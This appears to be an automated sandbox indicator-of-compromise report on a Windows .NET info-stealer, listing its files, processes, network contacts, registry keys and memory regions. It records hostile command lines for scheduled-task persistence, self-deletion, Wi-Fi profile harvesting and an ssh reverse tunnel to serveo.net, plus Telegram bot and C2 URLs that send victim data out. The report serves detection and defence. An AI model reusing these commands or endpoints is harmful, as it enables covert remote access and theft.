IOC Report
0LpFv1haTA.exe

loading gif

Files

File Path
Type
Category
Malicious
0LpFv1haTA.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_0LpFv1haTA.exe_308cea159c14f9b5b03db652f16eb04856bea_a7b8af99_77488a70-eb7c-42ac-8dd0-e13389be6d52\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0LpFv1haTA.exe.log
CSV text
modified
malicious
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmp4A67.tmp
ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\XenoManager\manager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\manager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Windows\WER\Temp\WER895A.tmp.dmp
Mini DuMP crash report, 16 streams, Fri Sep 27 21:27:18 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CA6.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CE6.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\.ssh\known_hosts
ASCII text, with very long lines (404), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\manager.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Temp\helloworld.txt
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\phgsswc3mw\p.dat
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\phgsswc3mw\report.lock
very short file (no magic)
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
\Device\Null
ASCII text, with CRLF line terminators, with overstriking
dropped
There are 8 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\0LpFv1haTA.exe
"C:\Users\user\Desktop\0LpFv1haTA.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
malicious
C:\Windows\System32\schtasks.exe
schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f
malicious
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
"C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
malicious
C:\Windows\System32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
malicious
C:\Windows\System32\netsh.exe
netsh wlan show profiles
malicious
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
malicious
C:\Windows\System32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
malicious
C:\Windows\System32\netsh.exe
netsh wlan show networks mode=bssid
malicious
C:\Windows\System32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
malicious
C:\Windows\System32\netsh.exe
netsh wlan show profiles
malicious
C:\Windows\System32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
malicious
C:\Windows\System32\netsh.exe
netsh wlan show networks mode=bssid
malicious
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
malicious
C:\Users\user\AppData\Roaming\manager.exe
"C:\Users\user\AppData\Roaming\manager.exe"
malicious
C:\Users\user\AppData\Roaming\XenoManager\manager.exe
"C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
malicious
C:\Users\user\AppData\Roaming\XenoManager\manager.exe
C:\Users\user\AppData\Roaming\XenoManager\manager.exe
malicious
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
malicious
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
malicious
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\timeout.exe
timeout /t 3
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\findstr.exe
findstr "SSID BSSID Signal"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\System32\OpenSSH\ssh.exe
"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\findstr.exe
findstr "SSID BSSID Signal"
C:\Windows\System32\OpenSSH\ssh.exe
"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 32 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML
149.154.167.220
malicious
https://api.telegram.org
unknown
malicious
https://api.telegram.org/bot
unknown
malicious
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML
149.154.167.220
malicious
http://185.253.7.60:8080//sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ==
185.253.7.60
malicious
http://185.253.7.60:8080//mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE
185.253.7.60
malicious
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML
149.154.167.220
malicious
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage
unknown
malicious
https://api.tele
unknown
malicious
193.149.187.135
malicious
https://duckduckgo.com/chrome_newtab
unknown
https://duckduckgo.com/ac/?q=
unknown
http://185.217.98.121:80
unknown
https://138.2.92.67:443
unknown
http://176.9.149.76:8051
unknown
http://202.120.7.24:54321
unknown
http://123.30.140.234:9080
unknown
http://20.78.55.47:8080
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://167.99.138.249:8080/K7IvH_user%40051829_report.wsr
unknown
http://185.253.7.60:8080
unknown
http://107.161.20.142:8080
unknown
https://5.196.181.135:443
unknown
https://44.228.161.50:443
unknown
https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net/
unknown
https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net
unknown
https://192.99.196.191:443
unknown
http://ip-api.com/line?fields=query,country
208.95.112.1
http://167.99.138.249:80802
unknown
https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net
unknown
http://18.228.80.130:80
unknown
http://167.99.138.249
unknown
http://194.5.152.106:8080
unknown
http://66.42.56.128:80
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
http://167.99.138.249:8080
unknown
http://ip-api.com
unknown
http://51.178.38.93:8080
unknown
http://185.253.7.60:80802
unknown
http://45.184.180.226:8080
unknown
http://185.217.98.121:8080
unknown
http://8.219.110.16:9999
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://185.253.7.60:8080/
unknown
http://47.96.78.224:8080
unknown
https://node.trezor.io
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://185.80.128.17/manager.exe
185.80.128.17
http://95.216.147.179:80
unknown
http://185.253.7.60:8080//sendData
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://188.120.242.78:8817
unknown
https://154.9.207.142:443
unknown
http://127.0.0.1:21325/enumerate
unknown
http://167.99.138.249:8080/%4B%37%49%76%48%5F%61%6C%66%6F%6E%73%40%30%35%31%38%32%39%5F%72%65%70%6F%
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://upx.sf.net
unknown
https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net/
unknown
http://127.0.0.1:7634/
unknown
http://ip-api.com/line?fields=query
unknown
http://159.203.174.113:8090
unknown
https://www.ecosia.org/newtab/
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://185.217.98.121:443
unknown
http://185.253.7.60:8080/8
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://116.202.101.219:8080
unknown
http://185.253.7.60:8080//sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&u
unknown
https://46.51.231.213:443
unknown
http://127.0.0.1:
unknown
http://38.60.191.38:80
unknown
http://167.99.138.249:8080/K7IvH_user
unknown
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578
unknown
https://support.mozilla.org/product
unknown
http://206.189.109.146:80
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
http://8f7482867cc6a5aec99ead5e72d7016e.serveo.net:7634//8f7482867cc6a5aec99ead5e72d7016e.serveo.net
unknown
http://45.82.65.63:80
unknown
https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
unknown
http://41.87.207.180:9090
unknown
http://api.telegram.org
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
http://3.12.151.253:80
unknown
There are 73 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
api.telegram.org
149.154.167.220
malicious
serveo.net
138.68.79.95
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
188.120.242.78
unknown
Russian Federation
malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
206.189.109.146
unknown
United States
malicious
193.149.187.135
unknown
Denmark
malicious
167.99.138.249
unknown
United States
malicious
185.253.7.60
unknown
Russian Federation
malicious
45.82.65.63
unknown
United Kingdom
malicious
185.80.128.17
unknown
Lithuania
208.95.112.1
ip-api.com
United States
138.68.79.95
serveo.net
United States
127.0.0.1
unknown
unknown
There are 1 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
FileDirectory
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
ProgramId
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
FileId
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
LowerCaseLongPath
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
LongPathHash
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
Name
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
OriginalFileName
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
Publisher
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
Version
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
BinFileVersion
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
BinaryType
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
ProductName
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
ProductVersion
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
LinkDate
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
BinProductVersion
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
AppxPackageFullName
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
AppxPackageRelativeId
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
Size
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
Language
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
Usn
There are 23 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
242000
unkown
page readonly
malicious
7FF848E0D000
trusted library allocation
page execute and read and write
1E459EA1000
trusted library allocation
page read and write
1ADB3610000
heap
page execute and read and write
1ADB3577000
heap
page read and write
A3F09FE000
stack
page read and write
2310E2EA000
heap
page read and write
A3EFAED000
stack
page read and write
19233110000
trusted library allocation
page read and write
1E449F47000
trusted library allocation
page read and write
BB064FC000
stack
page read and write
21F12DBD000
trusted library allocation
page read and write
1E462735000
heap
page read and write
361A7FE000
stack
page read and write
7FF848E12000
trusted library allocation
page read and write
1B2B14B7000
trusted library allocation
page read and write
19232ED5000
heap
page read and write
1ADB50E7000
trusted library allocation
page read and write
1ADB354B000
heap
page read and write
21F2A5F2000
heap
page read and write
21F12C9D000
trusted library allocation
page read and write
1E44A26A000
trusted library allocation
page read and write
21F2A8B3000
heap
page read and write
1E44813A000
heap
page read and write
21F0F870000
heap
page execute and read and write
FD8E3DF000
stack
page read and write
F10000
trusted library allocation
page read and write
32AE000
trusted library allocation
page read and write
20D7367A000
heap
page read and write
21F12E3B000
trusted library allocation
page read and write
2898B599000
trusted library allocation
page read and write
21F12CCB000
trusted library allocation
page read and write
21F12D67000
trusted library allocation
page read and write
21F22135000
trusted library allocation
page read and write
21F2AEA4000
heap
page read and write
1ADB352B000
heap
page read and write
50CB39E000
stack
page read and write
19457E13000
heap
page read and write
2898B3A3000
trusted library allocation
page read and write
1ADB354D000
heap
page read and write
1E45A511000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
20947780000
heap
page read and write
678000
heap
page read and write
57272FE000
unkown
page read and write
21F12D7F000
trusted library allocation
page read and write
1E45A4A3000
trusted library allocation
page read and write
2898B349000
trusted library allocation
page read and write
1E449B20000
trusted library allocation
page read and write
7FF848E03000
trusted library allocation
page read and write
21F2AF3D000
heap
page read and write
21F0F8A0000
heap
page read and write
2898B3B1000
trusted library allocation
page read and write
7FF848F99000
trusted library allocation
page read and write
1D13585A000
heap
page read and write
21F2AEB8000
heap
page read and write
BB066FF000
stack
page read and write
1D291DA0000
heap
page read and write
1E44A2CD000
trusted library allocation
page read and write
1E45AD67000
trusted library allocation
page read and write
7FF848FF2000
trusted library allocation
page read and write
1E462480000
heap
page read and write
21F12E29000
trusted library allocation
page read and write
3241000
trusted library allocation
page read and write
361B1FA000
stack
page read and write
21F12C6B000
trusted library allocation
page read and write
1B2B169B000
trusted library allocation
page read and write
1ADB38C5000
heap
page read and write
3080000
trusted library allocation
page read and write
21F2BF78000
heap
page read and write
2898B3B9000
trusted library allocation
page read and write
21F2A936000
heap
page read and write
217C8FF000
stack
page read and write
760000
heap
page read and write
7FF848E0B000
trusted library allocation
page execute and read and write
21F12CD9000
trusted library allocation
page read and write
21F29EA0000
heap
page read and write
21F12D4B000
trusted library allocation
page read and write
1E45A437000
trusted library allocation
page read and write
361B6FC000
stack
page read and write
1E449F06000
trusted library allocation
page read and write
21F12ED9000
trusted library allocation
page read and write
1C8FA580000
heap
page read and write
21F12D2F000
trusted library allocation
page read and write
2898B399000
trusted library allocation
page read and write
7FF848F89000
trusted library allocation
page read and write
21F2BEB4000
heap
page read and write
21F12C9F000
trusted library allocation
page read and write
21F2A23B000
heap
page read and write
1B2B1796000
trusted library allocation
page read and write
29974E60000
heap
page read and write
21F2B0C6000
heap
page read and write
21F12E6F000
trusted library allocation
page read and write
7FF848E03000
trusted library allocation
page execute and read and write
21F2B108000
heap
page read and write
1B2AFB40000
heap
page read and write
21F12EE9000
trusted library allocation
page read and write
1E44A098000
trusted library allocation
page read and write
1B2B14BB000
trusted library allocation
page read and write
1E45A55C000
trusted library allocation
page read and write
21F29B6F000
heap
page read and write
1ADB540B000
trusted library allocation
page read and write
2898B58A000
trusted library allocation
page read and write
83EBCFB000
stack
page read and write
21F12D2B000
trusted library allocation
page read and write
21F2B7E2000
heap
page read and write
1ADB50DD000
trusted library allocation
page read and write
9AF3DFE000
stack
page read and write
21F12EB9000
trusted library allocation
page read and write
1E459D58000
trusted library allocation
page read and write
1B2AF9CB000
heap
page read and write
1E459D64000
trusted library allocation
page read and write
D60000
trusted library allocation
page read and write
1E462400000
trusted library allocation
page read and write
1B2AF92A000
heap
page read and write
21F29210000
trusted library allocation
page read and write
21F12E11000
trusted library allocation
page read and write
21F12EE7000
trusted library allocation
page read and write
28D85038000
heap
page read and write
21F2A80D000
heap
page read and write
1E45B46B000
trusted library allocation
page read and write
1ADB5361000
trusted library allocation
page read and write
21F12CED000
trusted library allocation
page read and write
1B2AF8C0000
heap
page read and write
469E000
stack
page read and write
361B7FE000
stack
page read and write
21F2AFDC000
heap
page read and write
22B163E9000
heap
page read and write
23F68035000
heap
page read and write
83EBDFE000
stack
page read and write
1E461D70000
trusted library allocation
page read and write
1E459F48000
trusted library allocation
page read and write
1684000
trusted library allocation
page read and write
1E449EA5000
trusted library allocation
page read and write
A3EFDFF000
stack
page read and write
1E44A2BC000
trusted library allocation
page read and write
19457E92000
heap
page read and write
521E000
stack
page read and write
1E449DE4000
trusted library allocation
page read and write
21F12EC7000
trusted library allocation
page read and write
21F12CEF000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
1E449F36000
trusted library allocation
page read and write
21F12EAD000
trusted library allocation
page read and write
7FF848DF3000
trusted library allocation
page read and write
21F0F68F000
heap
page read and write
21F2A44C000
heap
page read and write
51FE000
stack
page read and write
2898B36B000
trusted library allocation
page read and write
1D292110000
heap
page read and write
1E449F21000
trusted library allocation
page read and write
1ADB50F1000
trusted library allocation
page read and write
21F12C2B000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
1E448125000
heap
page read and write
21F2B6FA000
heap
page read and write
1E462724000
heap
page read and write
20D735D0000
heap
page read and write
1E449E5E000
trusted library allocation
page read and write
F47000
heap
page read and write
1E44A326000
trusted library allocation
page read and write
209477FB000
heap
page read and write
511E000
stack
page read and write
21F12DEB000
trusted library allocation
page read and write
1E449F63000
trusted library allocation
page read and write
23AE000
stack
page read and write
2898B290000
heap
page execute and read and write
1B2B146F000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
19234B51000
trusted library allocation
page read and write
21F2A566000
heap
page read and write
217C514000
stack
page read and write
1B2B17CF000
trusted library allocation
page read and write
5720000
trusted library allocation
page read and write
7778BFE000
stack
page read and write
21F0F7A0000
trusted library allocation
page read and write
194599C1000
trusted library allocation
page read and write
21F29BB1000
heap
page read and write
1E462774000
heap
page read and write
1E45A59C000
trusted library allocation
page read and write
20D73570000
heap
page read and write
21F2A0B7000
heap
page read and write
21F12D27000
trusted library allocation
page read and write
1ADB5417000
trusted library allocation
page read and write
21F29F58000
heap
page read and write
21F12F05000
trusted library allocation
page read and write
1ADB5431000
trusted library allocation
page read and write
21F12E4F000
trusted library allocation
page read and write
1B2B14B5000
trusted library allocation
page read and write
7FF848E34000
trusted library allocation
page read and write
21F12CBF000
trusted library allocation
page read and write
21F0F7F3000
trusted library allocation
page read and write
77786FD000
stack
page read and write
21F12D5F000
trusted library allocation
page read and write
1E459DFD000
trusted library allocation
page read and write
21F11C76000
trusted library allocation
page read and write
19233210000
heap
page read and write
83EB9FE000
stack
page read and write
7FF848E04000
trusted library allocation
page read and write
21F2AA5E000
heap
page read and write
81F9CFF000
unkown
page read and write
7FF848FB0000
trusted library allocation
page read and write
21F29F20000
heap
page read and write
21F2AE89000
heap
page read and write
21F12EB3000
trusted library allocation
page read and write
21F12DC5000
trusted library allocation
page read and write
2898B39D000
trusted library allocation
page read and write
1E45A46E000
trusted library allocation
page read and write
1E449EAE000
trusted library allocation
page read and write
1390000
heap
page read and write
21F2BC48000
heap
page read and write
9AF398E000
stack
page read and write
21F2C058000
heap
page read and write
192330C0000
heap
page read and write
21F2A978000
heap
page read and write
A3EFCFF000
stack
page read and write
1E45AF07000
trusted library allocation
page read and write
7FF848DF4000
trusted library allocation
page read and write
21F2A548000
heap
page read and write
1B2B14BD000
trusted library allocation
page read and write
AFF000
stack
page read and write
23F67D75000
heap
page read and write
21F12D91000
trusted library allocation
page read and write
21F12E9D000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page read and write
21F12EA7000
trusted library allocation
page read and write
A3F03FA000
stack
page read and write
21F2208A000
trusted library allocation
page read and write
1ADB53E1000
trusted library allocation
page read and write
1ADB50DF000
trusted library allocation
page read and write
1B2B17DD000
trusted library allocation
page read and write
2310E1F0000
heap
page read and write
289899E0000
heap
page read and write
1E44A16C000
trusted library allocation
page read and write
4D6194C000
stack
page read and write
21F12D47000
trusted library allocation
page read and write
1B2B169F000
trusted library allocation
page read and write
29974E55000
heap
page read and write
21F2BFD0000
heap
page read and write
19234EDF000
trusted library allocation
page read and write
289897CD000
heap
page read and write
7FF848E3D000
trusted library allocation
page execute and read and write
1E45B47F000
trusted library allocation
page read and write
5290000
heap
page execute and read and write
7FF848E01000
trusted library allocation
page read and write
1B2B169D000
trusted library allocation
page read and write
21F12C65000
trusted library allocation
page read and write
21F12C3B000
trusted library allocation
page read and write
9BF000
stack
page read and write
1E449EBB000
trusted library allocation
page read and write
1E45AE87000
trusted library allocation
page read and write
1E4481D7000
heap
page read and write
19457D40000
heap
page read and write
1E45AD91000
trusted library allocation
page read and write
19457DCA000
heap
page read and write
156E000
heap
page read and write
1E45A45B000
trusted library allocation
page read and write
1830EC6B000
heap
page read and write
1E4629D4000
heap
page read and write
1E449D41000
trusted library allocation
page read and write
1ADB50DB000
trusted library allocation
page read and write
21F12C79000
trusted library allocation
page read and write
1E449B40000
trusted library allocation
